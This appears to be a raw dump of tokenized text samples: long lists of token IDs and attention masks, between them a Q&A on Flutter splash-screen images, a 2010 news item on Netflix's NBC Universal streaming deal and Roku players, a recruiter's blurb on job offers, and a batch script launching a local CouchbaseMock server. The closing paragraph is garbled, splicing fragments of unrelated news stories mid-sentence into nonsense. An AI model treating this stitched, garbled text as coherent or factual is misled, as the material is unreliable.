13, 12330, 3225, 467, 2040, 14885, 1149, 3336, 13, 29871, 12721, 17619, 2824, 4204, 3552, 29875, 29892, 321, 29897, 1149, 3336, 13, 1678, 2427, 29872, 467, 4268, 877, 28193, 742, 29871, 29896, 467, 20131, 3319, 30004, 13, 418, 17012, 29901, 29871, 29900, 29889, 29945, 30004, 13, 1678, 2981, 29871, 29941, 29900, 29900, 29900, 6075, 13, 29871, 24426, 13, 3680, 13, 29889, 17619, 14626, 13, 29871, 2920, 29901, 29871, 29945, 29900, 1756, 2104, 13, 29871, 3171, 29901, 29871, 29945, 29900, 1756, 2104, 13, 29871, 17012, 29901, 29871, 29900, 29889, 29945, 2104, 13, 29871, 3239, 29901, 396, 29900, 29900, 29900, 2104, 13, 29871, 5906, 29899, 8968, 29901, 29871, 29906, 1756, 2104, 13, 29913, 13, 29966, 2154, 4765, 543, 991, 597, 29062, 29889, 28260, 29889, 510, 29914, 6538, 29914, 10254, 29914, 5880, 29914, 29941, 29889, 29941, 29889, 29896, 29914, 5880, 29889, 1195, 29889, 1315, 5319, 2154, 3238, 13, 29966, 4563, 770, 543, 17619, 5319, 4563, 3238, 13, 29966, 4563, 770, 543, 17619, 5319, 4563, 3238, 13, 29966, 4563, 770, 543, 17619, 5319, 4563, 3238, 13, 29966, 4563, 770, 543, 17619, 5319, 4563, 29958, 13, 13 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Q: How to use an image other than the app icon in the splash screen for android I just added a logo for my app icon in the mipmap folder for android and assets.xcassets folder for IOS and I used a different image for the drawable folder so i can show as the splash screen instead of a pixelated icon logo. however now the app icon is showing the splash screen image and the logo that i designed is not showing. any idea which folder represents the splash screen and which one is for the logo in android? A: If you use the flutter launcher icons package, you can change the splash screen as well as the launcher icon of both android and ios.
[ 1, 660, 29901, 13, 13, 5328, 304, 671, 385, 1967, 916, 1135, 278, 623, 9849, 297, 278, 8536, 1161, 4315, 363, 1442, 13, 13, 29902, 925, 2715, 263, 20194, 363, 590, 623, 9849, 297, 278, 286, 666, 1958, 4138, 363, 1442, 322, 21608, 29889, 21791, 16596, 4138, 363, 306, 3267, 322, 306, 1304, 263, 1422, 1967, 363, 278, 4216, 519, 4138, 577, 474, 508, 1510, 408, 278, 8536, 1161, 4315, 2012, 310, 263, 15526, 630, 9849, 20194, 29889, 3138, 1286, 278, 623, 9849, 338, 6445, 278, 8536, 1161, 4315, 1967, 322, 278, 20194, 393, 474, 8688, 338, 451, 6445, 29889, 738, 2969, 607, 4138, 11524, 278, 8536, 1161, 4315, 322, 607, 697, 338, 363, 278, 20194, 297, 1442, 29973, 13, 13, 29909, 29901, 13, 13, 3644, 366, 671, 278, 20287, 6826, 261, 27673, 3577, 29892, 366, 508, 1735, 278, 8536, 1161, 4315, 408, 1532, 408, 278, 6826, 261, 9849, 310, 1716, 1442, 322, 10615, 29889, 13, 13 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Netflix Ups NBC TV Streaming Deal to Include Cable Shows Netflix and NBC Universal Sept. 24 said they signed an expanded television streaming deal that for the first time offer subscribers access to USA Networks and Syfy cable channel programs. Beginning next week, Netflix subscribers can stream all prior seasons of comedy “Psych,” drama “In Plain Sight,” as well as all seasons of “Monk,” starring Emmy and Golden Globe winner Tony Shalhoub. More than 75 prior season episodes of Syfy’s mainstay “Battlestar Galactica,” as well as prior seasons of the network’s popular series “Destination Truth” and “Eureka” are available for streaming for the first time. In addition through 2012, day-after broadcasts of “Saturday Night Live,” last seasons (as well previous seasons) of “30 Rock,” “The Office” and “Law & Order: SVU,” in addition to prior seasons – and eventually next year’s final season – of “Friday Night Lights” will be available. “This agreement adds meaningfully to the wide variety of content that can be streamed from Netflix and breaks new ground in our relationship with NBC Universal,” said Ted Sarandos, chief content officer for Netflix, in a statement. It wasn’t immediately clear if the agreement extends to Netflix's new Canadian streaming service, which launched Sept. 22. Separately, Roku Inc., which helped launch Netflix streaming on the “Roku Netflix Player” in 2008, has reportedly shipped its 1 millionth media player. In addition, the Saratoga, Calif.-based company dropped the price of its entry-level HD player to $59.99, and bowed the XDS model, which allows users for the first time to rewind programming up to 7 seconds. The new Roku XD ($79.99) and XDS ($99.99) offer 1080p HD resolution (via HDMI cable) and wireless connectivity. In addition, the XDS model features dual-band wireless technology, component video output, optical audio output, and a USB port. Over USB, customers will be able to play stored music, photos, and up to 1080p video using a USB playback channel, available as a free upgrade to XDS owners (expected to be available in November 2010).
[ 1, 12670, 20157, 29916, 501, 567, 405, 5371, 5648, 13763, 292, 897, 284, 304, 512, 2325, 315, 519, 1383, 1242, 13, 13, 6779, 20157, 29916, 322, 405, 5371, 21536, 28742, 29889, 29871, 29906, 29946, 1497, 896, 8794, 385, 17832, 11456, 24820, 5376, 393, 363, 278, 937, 931, 5957, 21696, 2596, 2130, 304, 8278, 8527, 29879, 322, 8713, 29888, 29891, 21387, 8242, 11104, 29889, 13, 13, 17946, 1076, 2446, 4723, 29892, 12670, 20157, 29916, 21696, 2596, 508, 4840, 599, 7536, 20084, 310, 26228, 1346, 29925, 29879, 3376, 3995, 18621, 1346, 797, 349, 7420, 317, 523, 3995, 408, 1532, 408, 599, 20084, 310, 1346, 7185, 29895, 3995, 380, 23693, 2812, 1357, 322, 16108, 21806, 915, 19576, 15293, 1383, 284, 10774, 29890, 29889, 13, 13, 20761, 1135, 29871, 29955, 29945, 7536, 4259, 23238, 310, 8713, 29888, 29891, 30010, 29879, 1667, 303, 388, 1346, 29933, 1131, 29880, 342, 279, 5208, 627, 983, 3995, 408, 1532, 408, 7536, 20084, 310, 278, 3564, 30010, 29879, 5972, 3652, 1346, 14994, 3381, 1605, 2806, 30024, 322, 1346, 29923, 545, 1335, 30024, 526, 3625, 363, 24820, 363, 278, 937, 931, 29889, 13, 13, 797, 6124, 1549, 29871, 29906, 29900, 29896, 29906, 29892, 2462, 29899, 7045, 12672, 29879, 310, 1346, 29903, 20510, 11554, 10782, 3995, 1833, 20084, 313, 294, 1532, 3517, 20084, 29897, 310, 1346, 29941, 29900, 8027, 3995, 1346, 1576, 11367, 30024, 322, 1346, 29931, 1450, 669, 8170, 29901, 13955, 29965, 3995, 297, 6124, 304, 7536, 20084, 785, 322, 10201, 2446, 1629, 30010, 29879, 2186, 4259, 785, 310, 1346, 29943, 2429, 388, 11554, 365, 5861, 30024, 674, 367, 3625, 29889, 13, 13, 30015, 4013, 17327, 12778, 6593, 3730, 304, 278, 9377, 12875, 310, 2793, 393, 508, 367, 4840, 287, 515, 12670, 20157, 29916, 322, 16706, 716, 5962, 297, 1749, 9443, 411, 405, 5371, 21536, 3995, 1497, 22040, 7745, 392, 359, 29892, 9087, 2793, 12139, 363, 12670, 20157, 29916, 29892, 297, 263, 3229, 29889, 13, 13, 3112, 9007, 30010, 29873, 7389, 2821, 565, 278, 17327, 4988, 304, 12670, 20157, 29916, 29915, 29879, 716, 11443, 24820, 2669, 29892, 607, 15241, 28742, 29889, 29871, 29906, 29906, 29889, 13, 13, 2008, 862, 2486, 29892, 390, 9154, 9266, 1696, 607, 9213, 6826, 12670, 20157, 29916, 24820, 373, 278, 1346, 29934, 9154, 12670, 20157, 29916, 14574, 30024, 297, 29871, 29906, 29900, 29900, 29947, 29892, 756, 8967, 368, 528, 16242, 967, 29871, 29896, 7284, 386, 5745, 4847, 29889, 512, 6124, 29892, 278, 7745, 271, 14895, 29892, 3037, 361, 9229, 6707, 5001, 13700, 278, 8666, 310, 967, 6251, 29899, 5563, 18435, 4847, 304, 395, 29945, 29929, 29889, 29929, 29929, 29892, 322, 12580, 287, 278, 1060, 8452, 1904, 29892, 607, 6511, 4160, 363, 278, 937, 931, 304, 337, 14800, 8720, 701, 304, 29871, 29955, 6923, 29889, 13, 13, 1576, 716, 390, 9154, 1060, 29928, 3255, 29955, 29929, 29889, 29929, 29929, 29897, 322, 1060, 8452, 3255, 29929, 29929, 29889, 29929, 29929, 29897, 5957, 29871, 29896, 29900, 29947, 29900, 29886, 18435, 10104, 313, 6071, 18435, 10403, 21387, 29897, 322, 26677, 4511, 2068, 29889, 512, 6124, 29892, 278, 1060, 8452, 1904, 5680, 14581, 29899, 4980, 26677, 15483, 29892, 4163, 4863, 1962, 29892, 27070, 10348, 1962, 29892, 322, 263, 12951, 2011, 29889, 6811, 12951, 29892, 20330, 674, 367, 2221, 304, 1708, 6087, 4696, 29892, 20612, 29892, 322, 701, 304, 29871, 29896, 29900, 29947, 29900, 29886, 4863, 773, 263, 12951, 1708, 1627, 8242, 29892, 3625, 408, 263, 3889, 14955, 304, 1060, 8452, 1914, 414, 313, 9684, 304, 367, 3625, 297, 3979, 29871, 29906, 29900, 29896, 29900, 467 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Offer management ·Getting a job offer is the result we all want, and usually means you are going to be earning more money, have more/less travel and things will be improving for you ·At Taylorollinson Ltd we’ve 25 years experience of getting people job offers. Sometimes our candidates are in the position of having two or more offers, presenting a favourable problem ·If we are responsible for one or more of these offers then we can help here, we can analyse these improvements or pro’s and cons of the job offers ·This way what we also offer a process where you know you’ve made the right call. If you go with another outside of our involvement, keep our number. We’ll be naturally disappointed we didn’t place you but that’s business
[ 1, 4587, 571, 10643, 13, 13, 30064, 2577, 1259, 263, 4982, 5957, 338, 278, 1121, 591, 599, 864, 29892, 322, 5491, 2794, 366, 526, 2675, 304, 367, 2326, 1076, 901, 6909, 29892, 505, 901, 29914, 2222, 9850, 322, 2712, 674, 367, 4857, 1747, 363, 366, 13, 13, 30064, 4178, 12537, 324, 1915, 1100, 19806, 591, 30010, 345, 29871, 29906, 29945, 2440, 7271, 310, 2805, 2305, 4982, 16688, 29889, 18512, 1749, 21669, 526, 297, 278, 2602, 310, 2534, 1023, 470, 901, 16688, 29892, 2198, 292, 263, 5025, 283, 18104, 1108, 13, 13, 30064, 3644, 591, 526, 14040, 363, 697, 470, 901, 310, 1438, 16688, 769, 591, 508, 1371, 1244, 29892, 591, 508, 16455, 344, 1438, 28473, 470, 410, 30010, 29879, 322, 1136, 310, 278, 4982, 16688, 13, 13, 30064, 4013, 982, 825, 591, 884, 5957, 263, 1889, 988, 366, 1073, 366, 30010, 345, 1754, 278, 1492, 1246, 29889, 960, 366, 748, 411, 1790, 5377, 310, 1749, 5297, 29841, 29892, 3013, 1749, 1353, 29889, 1334, 30010, 645, 367, 18180, 23451, 287, 591, 3282, 30010, 29873, 2058, 366, 541, 393, 30010, 29879, 5381 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
@ECHO OFF SET lcbdir=%srcdir% IF "%lcbdir%"=="" ( SET lcbdir=. ) SET MOCKPATH=%lcbdir%\tests\CouchbaseMock.jar java ^ -client^ -jar "%MOCKPATH%"^ --cccp^ --nodes=4^ --host=localhost^ --port=0^ %*
[ 1, 732, 29923, 3210, 29949, 438, 4198, 13, 10490, 301, 10702, 3972, 16328, 4351, 3972, 29995, 13, 6545, 11860, 29880, 10702, 3972, 23577, 29922, 13776, 313, 13, 1678, 11368, 301, 10702, 3972, 21098, 13, 29897, 13, 13, 10490, 16999, 7077, 10145, 16328, 29880, 10702, 3972, 29995, 29905, 21150, 29905, 29907, 3222, 3188, 18680, 29889, 4758, 13, 13, 1645, 6228, 13, 1678, 448, 4645, 29985, 13, 1678, 448, 4758, 11860, 6720, 7077, 10145, 23577, 29985, 13, 1678, 1192, 617, 6814, 29985, 13, 1678, 1192, 18010, 29922, 29946, 29985, 13, 1678, 1192, 3069, 29922, 7640, 29985, 13, 1678, 1192, 637, 29922, 29900, 29985, 13, 1678, 1273, 29930, 13 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
if only we could se if only we could see beyond the Oval in London. they slashed,which have completed a minimum of six years of offering courses and have still failed to get the accreditation,tastes superior than most beer brands. ? Hiken Shah,was crossing the road to go to work.2011, said Friday she will not speak to US president Donald Trump "after what he said about my child. "You can’t wash this one away by shaking my hand and saying ‘I’m sorry, For all the latest Chandigarh News,” says Luv.plan to launch Massive Open Online Courses (MOOCs) in both rural and urban areas to generate around 150, said: “(The) Ministry of Defence has decided not to extend ECHS facilities to non-pensioners, Captain Morgan will hope his spin department will put up a better show in the second game,after theylooked clueless against the ruthless pair of Kohli and Jadhav as well as the remainder of the batting order While there aren’t too many options for the English think-tank to tinker with in the team? last over of the match. So far, On 20 November, saying the election panel has failed to make needed reforms. The new bridge,During peak hours,scholars are more interested in Puri.t mere works of art. we cannot because MC is forced to work in coordination with NGOs like SPCA and PFA,said: ? So,which has many teachers on board,poor?resold? A survey was initiated by the administrationpursuant to the High Court directionson December 12012 An affidavit was filed by Rahul GuptaAssistant Estate OfficerChandigarhlast week The court has directed the administration to frame a policyso that such fraud do not take place in future For all the latest Chandigarh News download Indian Express App More Related News On 17 September, and we ran out of the store, Chennaiyin FC, but what is magic?Bhor,environmentalist Madhav Gadgil who had earlier submitted the report on eco-sensitive zones in Western Ghats has said that the Kasturirangan report is ? Shevek gives a speech during a large demonstration on the planet. This meant that whites were forced to buy into the promise of whiteness, is inaugurated as the 45th US president, The UN and US denounce "ethnic cleansing",Dr Ganesh Natrajan.
